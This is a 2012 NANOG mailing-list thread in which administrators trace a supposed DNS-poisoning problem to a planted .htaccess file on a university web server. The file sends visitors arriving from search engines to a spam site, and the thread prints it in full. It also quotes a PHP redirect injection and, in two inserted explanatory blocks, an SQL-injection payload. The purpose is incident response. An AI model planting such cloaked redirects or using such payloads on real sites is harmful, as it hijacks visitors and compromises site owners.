Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

2012-07-03 Thread Kyle Creyts
and upon further investigation, it seems like there might be an actual
organization using a host with that IP...

http://www.robtex.com/dns/chatwithus.net.html#shared


Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

2012-07-03 Thread Kyle Creyts
it actually appears that skywire has a suballocation for that block,
http://www.robtex.com/ip/208.88.11.111.html#whois

#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=208.88.11.111?showDetails=true&showARIN=false&ext=netref2
#

American West Internet SKYWIRE-SG (NET-208-88-11-0-1) 208.88.11.0 - 208.88.11.255
Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 - 208.88.11.255

#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#

On Wed, Jun 27, 2012 at 12:56 PM, Matthew Black wrote:

> By the way, FTP access originated from: 208.88.11.111
>
> Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 -
> 208.88.11.255
>
> NetRange:   208.88.8.0 - 208.88.11.255
> CIDR:   208.88.8.0/22
> OriginAS:   AS40603
> NetName:SKYWIRE-SG
> NetHandle:  NET-208-88-8-0-1
> Parent: NET-208-0-0-0-0
> NetType:Direct Allocation
> Comment:http://www.skywireusa.com
> RegDate:2008-03-04
> Updated:2012-03-02
> Ref:http://whois.arin.net/rest/net/NET-208-88-8-0-1
>
> OrgName:Sky Wire Communications
> OrgId:  DGSU
> Address:946 W Sunset Blvd Ste L
> City:   St George
> StateProv:  UT
> PostalCode: 84770
> Country:US
> RegDate:2007-12-04
> Updated:2009-11-04
> Ref:http://whois.arin.net/rest/org/DGSU
>
>
> Who We Are
> Skywire Communications is the Leading High Speed Internet Provider in
> Southern Utah. Offering Service in St George, Washington, Santa Clara,
> Ivins, Cedar City, and Enoch. It is the goal of SkyWire Communications to
> provide high speed internet access to 100 Percent of Southern Utah. We are
> located in St George, Utah.
>
>
>
>
> matthew black
> information technology services
> california state university, long beach
>
>
>

Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

2012-06-28 Thread Ken A



On 6/28/2012 6:05 AM, Tei wrote:


If you use these projects that already do 99% of what the customer
needs, plus 120% the customer does not need (and perhaps doesn't want), the
code quality will normally be good, with **horrible** exceptions.
But sooner or later (weeks) there will be exploits for this codebase,
to hack the site in horrible ways.  If the customer doesn't pay for
maintenance and doesn't do the maintenance himself, the code will turn
comically outdated. Hacking the site will be easy for children aged 5
and up. Maintenance sucks.  This option sucks.

All options suck.


That's why there are things like mod_security and other application 
level firewalls. Once exploits have CVE numbers, so do the fixes to the 
firewalls. And, due to the cost of custom software and the ease of use of 
push-button-install Wordpress, this isn't likely to change soon.
It would be nice if WP/Joomla/etc force auto-updated by default, at 
least for sec fixes..

Ken
Pacific.Net



Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

2012-06-28 Thread Tei
On 28 June 2012 14:48, Arturo Servin  wrote:
...
>
>        Think about SQL injection; it is not tied to specific platforms but 
> to general bad programming practices.

If you are already a good programmer, writing code that is safe
against SQL injections is trivial.  So it is not a real problem, and
that's why I don't mention it.   A real problem is one that you can't
avoid by just walking one step to the left.
But I support that you champion it, and I fully agree bad code is
possible and some people do write it. We don't really disagree.



-- 
--
ℱin del ℳensaje.



Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

2012-06-28 Thread Arturo Servin

On 28 Jun 2012, at 08:05, Tei wrote:

> On 27 June 2012 09:50, Stephane Bortzmeyer  wrote:
>> (specially for a Web site written in
>> PHP)?
>> 
> 
> We software makers have a problem: when a customer asks for an
> application, often there is a web project that already does it (for the
> most part it is a round peg in a round hole). So a natural solution is to
> install this project and customize it to his needs (theme, perhaps
> some programming).  The other option is to create the code from scratch
> (perhaps using a framework).
> 
> If you create the code from scratch, it will be safe.  

I would challenge this. This is not true unless you follow very strict 
rules to make your code safe, and even then, you are not completely safe.

> A tree can't get
> a human virus, and a human can't get a tree virus. You are not
> unhackable, bad practices will bite you in the long term, but you
> don't see exploits made specifically for this custom-made code daily.

Think about SQL injection; it is not tied to specific platforms but 
to general bad programming practices.



=)

Regards,
as
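
The SQL injection Arturo and Tei are arguing about, as an added example that is not part of the thread. It puts the bad practice (plaintext passwords compared inside a string-built query) next to the fix (parameter binding plus a salted PBKDF2 check in code), against an in-memory SQLite table. The table names, accounts and passwords are invented for the demonstration.

```python
import hashlib
import hmac
import os
import sqlite3


def derive(password, salt):
    """Salted, slow password hash; verification happens in code, not in SQL."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


def make_db():
    """In-memory database with two constructed accounts stored both ways."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users_plain (username TEXT, password TEXT)")
    conn.execute("CREATE TABLE users (username TEXT, salt BLOB, pw_hash BLOB)")
    for user, pw in [("alice", "correct horse"), ("bob", "hunter2")]:
        conn.execute("INSERT INTO users_plain VALUES (?, ?)", (user, pw))
        salt = os.urandom(16)
        conn.execute("INSERT INTO users VALUES (?, ?, ?)", (user, salt, derive(pw, salt)))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The bad practice: user input is pasted into the SQL text, so a quote
    in the username rewrites the query, and the password is compared as
    plaintext inside the database."""
    sql = ("SELECT 1 FROM users_plain WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """The fix: the username travels as a bound parameter (never as SQL
    syntax) and the password is verified against a salted hash, in constant
    time, in application code."""
    row = conn.execute("SELECT salt, pw_hash FROM users WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    return hmac.compare_digest(derive(password, salt), stored)


def demo():
    """Return (vulnerable, safe) outcomes for the classic comment-out payload."""
    conn = make_db()
    payload = "alice' --"          # closes the quote, comments out the password check
    return (login_vulnerable(conn, payload, "whatever"),
            login_safe(conn, payload, "whatever"))
```

The payload works against the first function because the driver receives `... username = 'alice' --' AND password = 'whatever'` and treats everything after `--` as a comment. The second function hands the same string to the driver as a value, so it is compared literally against the username column and matches nothing; and even a matching username still has to pass the hash check in code.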




Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

2012-06-28 Thread Tei
On 27 June 2012 09:50, Stephane Bortzmeyer  wrote:
>(specially for a Web site written in
> PHP)?
>

We software makers have a problem: when a customer asks for an
application, often there is a web project that already does it (for the
most part it is a round peg in a round hole). So a natural solution is to
install this project and customize it to his needs (theme, perhaps
some programming).  The other option is to create the code from scratch
(perhaps using a framework).

If you create the code from scratch, it will be safe.  A tree can't get
a human virus, and a human can't get a tree virus. You are not
unhackable, bad practices will bite you in the long term, but you
don't see exploits made specifically for this custom-made code daily.
 Too bad, the features the code allows will be few, limited to the
budget of the project.  Programming sucks, and generates code and bugs,
and everybody suffers for it.  This option sucks.

If you use these projects that already do 99% of what the customer
needs, plus 120% the customer does not need (and perhaps doesn't want), the
code quality will normally be good, with **horrible** exceptions.
But sooner or later (weeks) there will be exploits for this codebase,
to hack the site in horrible ways.  If the customer doesn't pay for
maintenance and doesn't do the maintenance himself, the code will turn
comically outdated. Hacking the site will be easy for children aged 5
and up. Maintenance sucks.  This option sucks.

All options suck.

Your browser will call you an idiot if you try to browse with an
outdated version.  But web projects are not this rude to owners. So
you have people browsing forums in Chrome 18, where the forum
software is a version from 2004 ("heavily customized", but this will not
save you).  Then a cracker comes, uses a known exploit from 2008, and
downloads 1.2 million unhashed passwords, where 98% of these
passwords are reused on facebook, twitter, linkedin and gmail.




-- 
--
ℱin del ℳensaje.



Re: DNS poisoning at Google?

2012-06-27 Thread Bryan Irvine
On Wed, Jun 27, 2012 at 9:48 AM, Matthew Black  wrote:
> Yes, we did that and also noted the username and IP address from where the 
> FTP upload originated.

It came from an FTP upload?  Why I oughta ...  ;-)



Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

2012-06-27 Thread AP NANOG

On 6/27/12 12:51 PM, Matthew Black wrote:

Ask and ye shall receive:

# more .htaccess (backup copy)

#c3284d#

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]

#/c3284d#

   # # #

matthew black
information technology services
california state university, long beach



G' did they miss anyone in that list of referers :-)

Thanks for posting!

--

Thank you,

Robert Miller
http://www.armoredpackets.com

Twitter: @arch3angel




RE: No DNS poisoning at Google (in case of trouble, blame the DNS)

2012-06-27 Thread Matthew Black
By the way, FTP access originated from: 208.88.11.111

Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 - 208.88.11.255

NetRange:   208.88.8.0 - 208.88.11.255
CIDR:   208.88.8.0/22
OriginAS:   AS40603
NetName:SKYWIRE-SG
NetHandle:  NET-208-88-8-0-1
Parent: NET-208-0-0-0-0
NetType:Direct Allocation
Comment:http://www.skywireusa.com
RegDate:2008-03-04
Updated:2012-03-02
Ref:http://whois.arin.net/rest/net/NET-208-88-8-0-1

OrgName:Sky Wire Communications
OrgId:  DGSU
Address:946 W Sunset Blvd Ste L
City:   St George
StateProv:  UT
PostalCode: 84770
Country:US
RegDate:2007-12-04
Updated:2009-11-04
Ref:http://whois.arin.net/rest/org/DGSU


Who We Are
Skywire Communications is the Leading High Speed Internet Provider in Southern 
Utah. Offering Service in St George, Washington, Santa Clara, Ivins, Cedar 
City, and Enoch. It is the goal of SkyWire Communications to provide high speed 
internet access to 100 Percent of Southern Utah. We are located in St George, 
Utah.




matthew black
information technology services
california state university, long beach




RE: No DNS poisoning at Google (in case of trouble, blame the DNS)

2012-06-27 Thread Matthew Black
Ask and ye shall receive:

# more .htaccess (backup copy)

#c3284d#

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]

#/c3284d#

  # # #

matthew black
information technology services
california state university, long beach



-Original Message-
From: Jason Hellenthal [mailto:jhellent...@dataix.net] 
Sent: Wednesday, June 27, 2012 6:26 AM
To: Arturo Servin
Cc: nanog@nanog.org
Subject: Re: No DNS poisoning at Google (in case of trouble, blame the DNS)


What would be nice is to see the contents of the htaccess file
(obviously with sensitive information excluded)


-- 

 - (2^(N-1))
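
An added example, not from the thread or from the site involved: a small mod_rewrite evaluator that shows why the c3284d rules above were invisible to anyone typing the URL directly and only fired for visitors arriving from a search engine or social site, which is what made the problem look like something on Google's side. The .htaccess fragment in the code is a constructed subset of the one posted (same structure and target, only nine of the referer names); the site host www.example.edu and the request samples are assumptions.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Constructed .htaccess fragment modelled on the c3284d one posted in the
# thread: same structure and redirect target, but only nine of the ~180
# referer names in the alternation, so the sample stays readable.
SAMPLE_HTACCESS = r"""
#c3284d#
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(aol|ask|baidu|bing|facebook|google|yahoo|yandex|youtube)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]
#/c3284d#
"""


@dataclass
class Rule:
    conds: list            # [(server variable, compiled regex), ...] preceding the rule
    pattern: "re.Pattern"  # RewriteRule pattern, tested against the request path
    target: str            # substitution (here an absolute URL)
    flags: dict            # parsed [R=301,L] style flags


def parse_htaccess(text):
    """Pair every RewriteRule with the RewriteCond lines that precede it."""
    rules, pending = [], []
    for raw in text.splitlines():
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        if parts[0] == "RewriteCond" and len(parts) >= 3:
            nc = len(parts) > 3 and "NC" in parts[3].strip("[]").split(",")
            pending.append((parts[1], re.compile(parts[2], re.IGNORECASE if nc else 0)))
        elif parts[0] == "RewriteRule" and len(parts) >= 3:
            flags = {}
            if len(parts) > 3:
                for item in parts[3].strip("[]").split(","):
                    key, _, value = item.partition("=")
                    flags[key] = value
            rules.append(Rule(pending, re.compile(parts[1]), parts[2], flags))
            pending = []
    return rules


def evaluate(rules, path, headers):
    """Return (status, location) for the first rule that fires, else None.
    Mirrors per-directory mod_rewrite: the path is tested without its
    leading slash and every RewriteCond must match (regex search)."""
    env = {
        "%{HTTP_REFERER}": headers.get("Referer", ""),
        "%{HTTP_USER_AGENT}": headers.get("User-Agent", ""),
    }
    for rule in rules:
        if not rule.pattern.search(path.lstrip("/")):
            continue
        if all(rx.search(env.get(var, "")) for var, rx in rule.conds):
            # R without a code means 302; no R flag means an internal rewrite
            status = int(rule.flags["R"] or 302) if "R" in rule.flags else None
            return status, rule.target
    return None


def is_cloaked_redirect(rule, site_host):
    """Triage heuristic: an external redirect that only fires on the
    referer or user agent is almost never something the site owner wrote."""
    target_host = urlsplit(rule.target).hostname
    external = target_host is not None and target_host != site_host
    conditional = any(var in ("%{HTTP_REFERER}", "%{HTTP_USER_AGENT}")
                      for var, _ in rule.conds)
    return external and conditional and "R" in rule.flags


def triage(text, site_host):
    """List the targets of every cloaked redirect found in an .htaccess text."""
    return [r.target for r in parse_htaccess(text) if is_cloaked_redirect(r, site_host)]
```

Two things worth noticing in the posted rule: the alternation is unanchored, so short entries such as `mail`, `web`, `search`, `ask` or `ya` match far more referers than the named sites, and there is no [NC] flag, so a capitalised referer slips through. To check a live site for the same cloaking without reading its .htaccess, send the same request twice with curl, once with `-e 'http://www.google.com/'` and once without, and compare the status lines.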






RE: DNS poisoning at Google?

2012-06-27 Thread Matthew Black
Yes, we did that and also noted the username and IP address from where the FTP 
upload originated.

matthew black
information technology services
california state university, long beach



-Original Message-
From: Michael J Wise [mailto:mjw...@kapu.net] 
Sent: Wednesday, June 27, 2012 12:37 AM
To: nanog@nanog.org
Subject: Re: DNS poisoning at Google?


On Jun 27, 2012, at 12:06 AM, Matthew Black wrote:

> We found the aberrant .htaccess file and have removed it. What a mess!


Trusting you carefully noted the date/time stamp before removing it, as that's 
an important bit of forensics.

Aloha,
Michael.
-- 
"Please have your Internet License 
 and Usenet Registration handy..."







Re: DNS poisoning at Google?

2012-06-27 Thread AP NANOG
This may not help Matt now, but I just came across this today and 
believe it may help others who have to deal with incidents:


http://cert.societegenerale.com/en/publications.html --> "IRM (Incident 
Response Methodologies)"


If you changed the file contents before noting the created date, 
modified date, etc., then begin looking at your backups.  This date will 
then help you track down the log entries and finally lead you to the 
root cause.


Also, if possible, please post the culprit code that caused this, 
exif'ing the sensitive data of course :-)


--

Thank you,

Robert Miller
http://www.armoredpackets.com

Twitter: @arch3angel

On 6/27/12 7:50 AM, TR Shaw wrote:

On Jun 27, 2012, at 3:36 AM, Michael J Wise wrote:


On Jun 27, 2012, at 12:06 AM, Matthew Black wrote:


We found the aberrant .htaccess file and have removed it. What a mess!


Trusting you carefully noted the date/time stamp before removing it, as that's 
an important bit of forensics.

And don't forget there is a trail on that file on your backups.

Tom







Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

2012-06-27 Thread Ryan Rawdon

On Jun 27, 2012, at 10:10 AM, Ryan Rawdon wrote:

> 
> 
> On Jun 27, 2012, at 9:26 AM, Jason Hellenthal wrote:
> 
>> 
>> What would be nice is to see the contents of the htaccess file
>> (obviously with sensitive information excluded)
> 
> 
> I cleaned up compromises similar to this in a customer site fairly recently.  
> In our case it was the exact same behavior, but it was PHP injected into their 
> application instead of .htaccess.  I do not recall what the original 
> compromise vector was; it was something in the customer's custom application 
> which they resolved.
> 
> It looked like the malware did a find and replace for  with:
> 
> 




http://r.u13.net/permatemp/forefront.png

My message may have gotten caught as spam/malicious by filters.  Not sure if it 
caught the base64 or plaintext so I snipped both.  You can view my original 
message in the archives at 
http://mailman.nanog.org/pipermail/nanog/2012-June/049612.html



> 
> 
> 
> (where brugge.osa.pl was the destination for the redirects in the compromise 
> of this customer site)
> 
> 
> 




Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

2012-06-27 Thread Ryan Rawdon


On Jun 27, 2012, at 9:26 AM, Jason Hellenthal wrote:

> 
> What would be nice is to see the contents of the htaccess file
> (obviously with sensitive information excluded)


I cleaned up compromises similar to this in a customer site fairly recently.  
In our case it was the exact same behavior, but it was PHP injected into their 
application instead of .htaccess.  I do not recall what the original 
compromise vector was; it was something in the customer's custom application 
which they resolved.

It looked like the malware did a find and replace for http://brugge.osa.pl/";);
exit();
}
}
}
}

(where brugge.osa.pl was the destination for the redirects in the compromise of 
this customer site)







Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

2012-06-27 Thread Jason Hellenthal

What would be nice is to see the contents of the htaccess file
(obviously with sensitive information excluded)

On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:
> 
> It was not DNS issue, but it was a clear case on how community-support helped.
> 
> Some of us may even learn some new tricks. :)
> 
> Regards,
> as
> 
> Sent from mobile device. Excuse brevity and typos.
> 
> 

-- 

 - (2^(N-1))



Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

2012-06-27 Thread Arturo Servin

It was not DNS issue, but it was a clear case on how community-support helped.

Some of us may even learn some new tricks. :)

Regards,
as

Sent from mobile device. Excuse brevity and typos.


On 27 Jun 2012, at 05:07, Daniel Rohan  wrote:

> On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer 
> wrote:
> 
> What made you think it can be a DNS cache poisoning (a very rare
>> event, despite what the media say) when there are many much more
>> realistic possibilities (especially for a Web site written in
>> PHP)?
>> 
>> What was the evidence pointing to a DNS problem?
>> 
> 
> It seems likely that he made a mistake in his analysis of the evidence.
> Something that could happen to anyone when operating outside of a comfort
> zone or having a bad day. Go easy.
> 
> -DR



Re: DNS poisoning at Google?

2012-06-27 Thread TR Shaw

On Jun 27, 2012, at 3:36 AM, Michael J Wise wrote:

> 
> On Jun 27, 2012, at 12:06 AM, Matthew Black wrote:
> 
>> We found the aberrant .htaccess file and have removed it. What a mess!
> 
> 
> Trusting you carefully noted the date/time stamp before removing it, as 
> that's an important bit of forensics.

And don't forget there is a trail on that file on your backups.

Tom




Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

2012-06-27 Thread Daniel Rohan
On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer wrote:

What made you think it can be a DNS cache poisoning (a very rare
> event, despite what the media say) when there are many much more
> realistic possibilities (especially for a Web site written in
> PHP)?
>
> What was the evidence pointing to a DNS problem?
>

It seems likely that he made a mistake in his analysis of the evidence.
Something that could happen to anyone when operating outside of a comfort
zone or having a bad day. Go easy.

-DR


No DNS poisoning at Google (in case of trouble, blame the DNS)

2012-06-27 Thread Stephane Bortzmeyer
On Wed, Jun 27, 2012 at 03:53:17AM +,
 Matthew Black  wrote 
 a message of 18 lines which said:

> We believe the DNS servers used by Google's crawler have been poisoned.

[After reading the whole thread and discovering that Google was indeed
right.]

What made you think it can be a DNS cache poisoning (a very rare
event, despite what the media say) when there are many much more
realistic possibilities (specially for a Web site written in
PHP)?

What was the evidence pointing to a DNS problem?



Re: DNS poisoning at Google?

2012-06-27 Thread Michael J Wise

On Jun 27, 2012, at 12:06 AM, Matthew Black wrote:

> We found the aberrant .htaccess file and have removed it. What a mess!


Trusting you carefully noted the date/time stamp before removing it, as that's 
an important bit of forensics.

Aloha,
Michael.
-- 
"Please have your Internet License 
 and Usenet Registration handy..."




Re: DNS poisoning at Google?

2012-06-27 Thread Ishmael Rufus
I'll take files that shouldn't have level 7 permissions for $400, Alex.

On Wed, Jun 27, 2012 at 2:09 AM, Bryan Irvine  wrote:

> The fun part will be figuring out how it got there. :)
>
> Sent from my iPhone
>
> On Jun 27, 2012, at 12:06 AM, Matthew Black 
> wrote:
>
> > We found the aberrant .htaccess file and have removed it. What a mess!
> >
> > matthew black
> > information technology services
> > california state university, long beach
> >
> > From: Grant Ridder [mailto:shortdudey...@gmail.com]
> > Sent: Tuesday, June 26, 2012 11:02 PM
> > To: Matthew Black; nanog@nanog.org
> > Cc: Jeremy Hanmer
> > Subject: Re: DNS poisoning at Google?
> >
> > It also redirects with facebook, youtube, and ebay but NOT amazon.
> >
> > -Grant
> >
> > On Wed, Jun 27, 2012 at 12:57 AM, Matthew Black <matthew.bl...@csulb.edu> wrote:
> > Our web lead was able to run curl. Thanks.
> >
> > matthew black
> > information technology services
> > california state university, long beach
> >
> > From: Grant Ridder [mailto:shortdudey...@gmail.com]
> > Sent: Tuesday, June 26, 2012 10:53 PM
> > To: Matthew Black
> > Cc: Landon Stewart; nanog@nanog.org; Jeremy Hanmer
> >
> > Subject: Re: DNS poisoning at Google?
> >
> > Matt, what happens when you get on a subnet that can access the webservers
> > directly and bypass the load balancer?  Try curl then and see if it's
> > something w/ the webserver or load balancer.
> >
> > -Grant
> > On Wed, Jun 27, 2012 at 12:40 AM, Matthew Black <matthew.bl...@csulb.edu> wrote:
> > Thanks again to everyone who helped. I didn't know what to enter with
> curl, because Outlook clobbered the line breaks in Jeremy's original
> message.
> >
> > Also, curl failed on our primary webserver because of firewall and load
> balancer magic settings. The Telnet method worked better!
> >
> > Our team is now scouring for that hidden redirect to couchtarts.
> >
> > matthew black
> > information technology services
> > california state university, long beach
> >
> > From: Landon Stewart [mailto:lstew...@superb.net]
> > Sent: Tuesday, June 26, 2012 10:37 PM
> > To: Matthew Black
> > Cc: Jeremy Hanmer; nanog@nanog.org<mailto:nanog@nanog.org>
> > Subject: Re: DNS poisoning at Google?
> > There is definitely a 301 redirect.
> >
> > $ curl -I --referer http://www.google.com/ http://www.csulb.edu/
> > HTTP/1.1 301 Moved Permanently
> > Date: Wed, 27 Jun 2012 05:36:31 GMT
> > Server: Apache/2.0.63
> > Location: http://www.couchtarts.com/media.php
> > Connection: close
> > Content-Type: text/html; charset=iso-8859-1
> > On 26 June 2012 22:05, Matthew Black <matthew.bl...@csulb.edu> wrote:
> > Google Webtools reports a problem with our HOMEPAGE "/". That page is
> not redirecting anywhere.
> > They also report problems with some 48 other primary sites, none of
> which redirect to the offending couchtarts.
> >
> > matthew black
> > information technology services
> > california state university, long beach
> >
> >
> >
> >
> > -Original Message-
> > From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com]
> > Sent: Tuesday, June 26, 2012 9:58 PM
> > To: Matthew Black
> > Cc: nanog@nanog.org
> > Subject: Re: DNS poisoning at Google?
> > It's not DNS.  If you're sure there's no htaccess files in place, check
> your content (even that stored in a database) for anything that might be
> altering data based on referrer.  This simple test shows what I mean:
> > Airy:~ user$ curl -e 'http://google.com' csulb.edu
> > <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
> > <html><head>
> > <title>301 Moved Permanently</title>
> > </head><body>
> > <h1>Moved Permanently</h1>
> > <p>The document has moved <a href="http://www.couchtarts.com/media.php">here</a>.</p>
> > </body></html>
> >
> > Running curl without the -e argument gives the proper site contents.
> > On Jun 26, 2012, at 9:24 PM, Matthew Black <matthew.bl...@csulb.edu> wrote:
> >
> >> Running Apache on three Sola

RE: DNS poisoning at Google?

2012-06-27 Thread Ian McDonald
Ahh, but how did it get there in the first place. Matthew, meet can of worms. I 
presume you have an opener.

--
ian
-Original Message-
From: Matthew Black
Sent:  27/06/2012, 08:07
To: Grant Ridder; nanog@nanog.org
Cc: Jeremy Hanmer
Subject: RE: DNS poisoning at Google?

We found the aberrant .htaccess file and have removed it. What a mess!

matthew black
information technology services
california state university, long beach

From: Grant Ridder [mailto:shortdudey...@gmail.com]
Sent: Tuesday, June 26, 2012 11:02 PM
To: Matthew Black; nanog@nanog.org
Cc: Jeremy Hanmer
Subject: Re: DNS poisoning at Google?

It also redirects with facebook, youtube, and ebay but NOT amazon.

-Grant

On Wed, Jun 27, 2012 at 12:57 AM, Matthew Black <matthew.bl...@csulb.edu> wrote:
Our web lead was able to run curl. Thanks.

matthew black
information technology services
california state university, long beach

From: Grant Ridder [mailto:shortdudey...@gmail.com]
Sent: Tuesday, June 26, 2012 10:53 PM
To: Matthew Black
Cc: Landon Stewart; nanog@nanog.org; Jeremy Hanmer

Subject: Re: DNS poisoning at Google?

Matt, what happens when you get on a subnet that can access the webservers directly 
and bypass the load balancer?  Try curl then and see if it's something w/ the 
webserver or load balancer.

-Grant
On Wed, Jun 27, 2012 at 12:40 AM, Matthew Black <matthew.bl...@csulb.edu> wrote:
Thanks again to everyone who helped. I didn't know what to enter with curl, 
because Outlook clobbered the line breaks in Jeremy's original message.

Also, curl failed on our primary webserver because of firewall and load 
balancer magic settings. The Telnet method worked better!

Our team is now scouring for that hidden redirect to couchtarts.

matthew black
information technology services
california state university, long beach

From: Landon Stewart [mailto:lstew...@superb.net]
Sent: Tuesday, June 26, 2012 10:37 PM
To: Matthew Black
Cc: Jeremy Hanmer; nanog@nanog.org
Subject: Re: DNS poisoning at Google?
There is definitely a 301 redirect.

$ curl -I --referer http://www.google.com/ http://www.csulb.edu/
HTTP/1.1 301 Moved Permanently
Date: Wed, 27 Jun 2012 05:36:31 GMT
Server: Apache/2.0.63
Location: http://www.couchtarts.com/media.php
Connection: close
Content-Type: text/html; charset=iso-8859-1
On 26 June 2012 22:05, Matthew Black <matthew.bl...@csulb.edu> wrote:
Google Webtools reports a problem with our HOMEPAGE "/". That page is not 
redirecting anywhere.
They also report problems with some 48 other primary sites, none of which 
redirect to the offending couchtarts.

matthew black
information technology services
california state university, long beach




-Original Message-
From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com]
Sent: Tuesday, June 26, 2012 9:58 PM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: DNS poisoning at Google?
It's not DNS.  If you're sure there's no htaccess files in place, check your 
content (even that stored in a database) for anything that might be altering 
data based on referrer.  This simple test shows what I mean:
Airy:~ user$ curl -e 'http://google.com' csulb.edu
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.couchtarts.com/media.php">here</a>.</p>
</body></html>

Running curl without the -e argument gives the proper site contents.
On Jun 26, 2012, at 9:24 PM, Matthew Black <matthew.bl...@csulb.edu> wrote:

> Running Apache on three Solaris webservers behind a load balancer. No MS 
> Windows!
>
> Not sure how malicious software could get between our load balancer and Unix 
> servers. Thanks for the tip!
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
> From: Landon Stewart [mailto:lstew...@superb.net]
> Sent: Tuesday, June 26, 2012 9:07 PM
> To: Matthew Black
> Cc: nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
>
> Is it possible that some malicious software is listening and injecting a 
> redirect on the wire?  We've seen this before with a Windows machine being 

Re: DNS poisoning at Google?

2012-06-27 Thread Bryan Irvine
